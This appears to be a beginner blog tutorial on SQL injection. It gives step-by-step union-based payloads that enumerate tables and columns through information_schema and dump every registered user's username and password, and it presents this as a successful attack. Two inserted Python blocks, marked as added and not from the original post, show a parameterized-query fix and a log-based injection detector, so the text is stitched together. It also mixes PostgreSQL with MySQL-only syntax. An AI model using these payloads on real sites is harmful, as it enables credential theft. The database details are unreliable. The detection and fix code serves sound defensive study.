SQL injection is one of the most popular web attacks, and it is considered one of the most severe, because with SQL injection one can read the database behind the website.
In this blog we will have a brief look at how you can exploit SQL injection in the simplest way.
I am assuming that you are a beginner to SQL injection, so for the sake of simplicity we will assume that the website is not using any kind of firewall and is not blocking any characters.
But in real life you will encounter websites where filtering is in place and all of the bad characters you enter are blocked.
How It Works?
Suppose there is a login portal which asks for your username and password, and if you entered them correctly your information is shown. Likewise, the information of many people would be stored in the database.
Suppose, you entered
Username = admin
Password = 1234
Now a request would be sent to the database server like
select * from <table> where user='admin' and pass='1234';
And if the above query is correct then the data of the requested user would be shown.
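To make the query above concrete, here is an added example (not code from the original post) of the two ways a login handler can build that statement: by pasting the username into the SQL text, which is what makes the rest of this post possible, and with a parameterized query, which is the fix. It assumes an in-memory sqlite3 table named users with constructed rows, standing in for the page's PostgreSQL <table>; the behaviour of both versions is the same on any SQL database.

```python
import sqlite3

# Added example, not from the original post. sqlite3 stands in for the
# page's PostgreSQL so it runs offline; the concatenation flaw and the
# parameterized fix look the same on any SQL database.

def make_db():
    """Create an in-memory stand-in for the page's <table> with constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user TEXT, pass TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("admin", "1234", "admin@example.test"),      # constructed sample data
         ("alice", "s3cret", "alice@example.test")],
    )
    return conn

def login_vulnerable(conn, user, pw):
    """Builds the statement by string concatenation, exactly like the page's
    select * from <table> where user='admin' and pass='1234';
    Whatever the user types becomes part of the SQL text."""
    sql = f"select * from users where user='{user}' and pass='{pw}'"
    return conn.execute(sql).fetchall()

def login_safe(conn, user, pw):
    """Parameterized statement: the driver sends the values separately from
    the SQL, so a quote or comment sign in the input is data, never syntax."""
    sql = "select * from users where user=? and pass=?"
    return conn.execute(sql, (user, pw)).fetchall()

def probe(conn, user, pw):
    """Run one login attempt through both versions and report the outcome."""
    try:
        vulnerable = f"{len(login_vulnerable(conn, user, pw))} row(s)"
    except sqlite3.OperationalError as exc:
        # This is the 'Generate Error' step from the post: the stray quote
        # breaks the statement and the database reports a syntax error.
        vulnerable = f"SQL error: {exc}"
    parameterized = f"{len(login_safe(conn, user, pw))} row(s)"
    return {"vulnerable": vulnerable, "parameterized": parameterized}

if __name__ == "__main__":
    db = make_db()
    for username, password in [("admin", "1234"),    # normal login
                               ("'", "1234"),        # the lone quotation mark
                               ("admin' --", "x")]:  # quote plus comment (-- in sqlite)
        print(repr(username), probe(db, username, password))
```

Running it shows the three outcomes the post walks through: the normal login returns one row in both versions, the lone quote makes the concatenated version throw a syntax error (the error message is what the attacker looks for on the page), and the quote-plus-comment input returns the admin row from the concatenated version without the password, while the parameterized version returns nothing in both bad cases.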
We will simply abuse this to take data from the database. The steps are:
- Generate Error
- Fix Error
- Find number of columns
- Find database name
- Find Table Name
- Find Column Name
- Extract data
I am assuming that my target database is PostgreSQL.
- Now let's suppose that instead of entering a username you entered a quotation mark (').
Now the query would be select * from <table> where user=''' and pass='1234';
Now you would see there are 3 quotation marks, and this violates the syntax of the query. If no WAF is used, an error message would be generated and seen on the web application.
Now we have to fix the query so that we can enter our own query to view inside the database.
Now suppose in the username field you entered admin' %23. This comments out the whole query after the %23 (the URL-encoded form of the # comment sign), and after executing it you will see nothing on the web page, nor an error.
The sign for a comment varies from database to database. Some of them are #, %23 (URL-encoded #), -- -, and --.
Now our username field looks like
admin' <space> %23
In the space we have to enter our query. To see the number of columns we use the order by command.
#Now all the commands I type from here on are to be placed in that blank space.
order by 10 = if the query has 10 columns or more then no error would be shown, and if it has fewer then an error would be shown. So we have to change the number until we find the correct number of columns.
Suppose I see an error on order by 5 and no error on order by 4; then there are 4 columns.
Final Query: admin' order by 4 %23
- Now we will use union select to see which number is reflected, and then we will enter our query there.
union select 1,2,3,4 = I have discovered 4 columns, so I have placed numbers counting up to 4 in the union select.
Now we observe which number is reflected on the web page.
Suppose 2 is reflected, so we can put our query in that position to see the database name and version.
union select 1,database(),3,4 = show database name
union select 1,version(),3,4 = show database version
- Now it is time to find the table names in the database. The column to query is table_name.
The default database is information_schema, so we will query the table names from that database.
admin' union select 1,table_name,3,4 from information_schema.tables %23
#Suppose I find the tables user_data, info, other_info
This will show us all the table names in the database.
Now we will find the columns in the table of our choice.
admin' union select 1,column_name,3,4 from information_schema.columns where table_name = 'user_data' %23
This will give us all the columns in the table user_data. Now suppose I got the columns username and password.
Now this is the final step of the SQL injection: we will extract the data.
admin' union select 1,username,3,4 from user_data %23
Now this will dump the usernames of all the registered users on the website.
admin' union select 1,password,3,4 from user_data %23
Now this will dump the passwords of all the registered users on the website.
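Every step above leaves a trace in the web server's access log, because the payload travels in the request parameters. Here is an added example (not from the original post) of detection logic that reads a few constructed access-log lines, URL-decodes the query-string parameters, and flags the patterns this post uses: the lone quote, a quote followed by a comment sign, order by probing, union select, and lookups in information_schema. The parameter names username and password, the /login path and the log lines themselves are all constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Added example, not from the original post. Constructed access-log lines
# (no real server) whose parameters mirror the post's steps: the lone quote,
# ORDER BY probing, UNION SELECT against information_schema, plus two
# harmless requests for contrast (a normal login and a name with an apostrophe).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /login?username=admin&password=1234 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /login?username=%27&password=1234 HTTP/1.1" 500 231
10.0.0.9 - - [01/Jan/2024:10:00:09 +0000] "GET /login?username=admin%27+order+by+5+%23&password=1234 HTTP/1.1" 500 231
10.0.0.9 - - [01/Jan/2024:10:00:12 +0000] "GET /login?username=admin%27+order+by+4+%23&password=1234 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:20 +0000] "GET /login?username=admin%27+union+select+1%2Ctable_name%2C3%2C4+from+information_schema.tables+%23&password=1234 HTTP/1.1" 200 4096
10.0.0.7 - - [01/Jan/2024:10:01:00 +0000] "GET /login?username=o%27brien&password=pw HTTP/1.1" 200 512
"""

# Common log format: client address, timestamp, "METHOD path PROTOCOL", status.
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) \S+" (\d{3})')

# Each rule matches one step of the technique described in the post. They run
# on the URL-decoded parameter value, so %27 / %23 / %2C are already ' / # / ,
RULES = [
    ("lone_quote",         re.compile(r"^\s*'\s*$")),                          # Generate Error
    ("quote_then_comment", re.compile(r"'.*(#|--)")),                          # Fix Error
    ("order_by_probe",     re.compile(r"\border\s+by\s+\d+", re.I)),           # Find number of columns
    ("union_select",       re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),  # Reflect / extract
    ("schema_enum",        re.compile(r"information_schema", re.I)),           # Table / column names
]

def scan_log(text):
    """Return one finding per request parameter that trips at least one rule."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        ip, _method, path, status = m.groups()
        # parse_qs decodes %XX escapes and '+' for us; keep_blank_values so
        # that an empty parameter is still inspected.
        params = parse_qs(urlsplit(path).query, keep_blank_values=True)
        for name, values in params.items():
            for value in values:
                hits = [rule for rule, rx in RULES if rx.search(value)]
                if hits:
                    findings.append({"ip": ip, "status": int(status),
                                     "param": name, "value": value, "rules": hits})
    return findings

def summarize(findings):
    """Count suspicious requests per client address; a run of hits from one
    address (especially with HTTP 500s mixed in) is the pattern to alert on."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts

if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(h["ip"], h["status"], h["param"], h["rules"], repr(h["value"]))
    print(summarize(hits))
```

On the sample, the four requests from 10.0.0.9 are flagged and the two harmless ones are not; the apostrophe in o'brien does not trip any rule because no comment sign or SQL keyword follows it. Two caveats a defender should keep in mind: an access log only carries GET query strings, so parameters sent in a POST body need the application's own request logging, and the 500 responses next to the first probes are the server-side view of the "Generate Error" step, which is why error responses to requests containing quotes are worth correlating with these hits.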
Congratulations!! We have successfully attacked the web application and forced it to dump its database.
Different web applications are coded in different ways, so the way of exploiting them will be different.
Also, SQL injection is a very vast topic and it is impossible to cover all of its details in one article. This article just gives you an overview of how you can exploit SQL injection.
- Dipanshu Pandey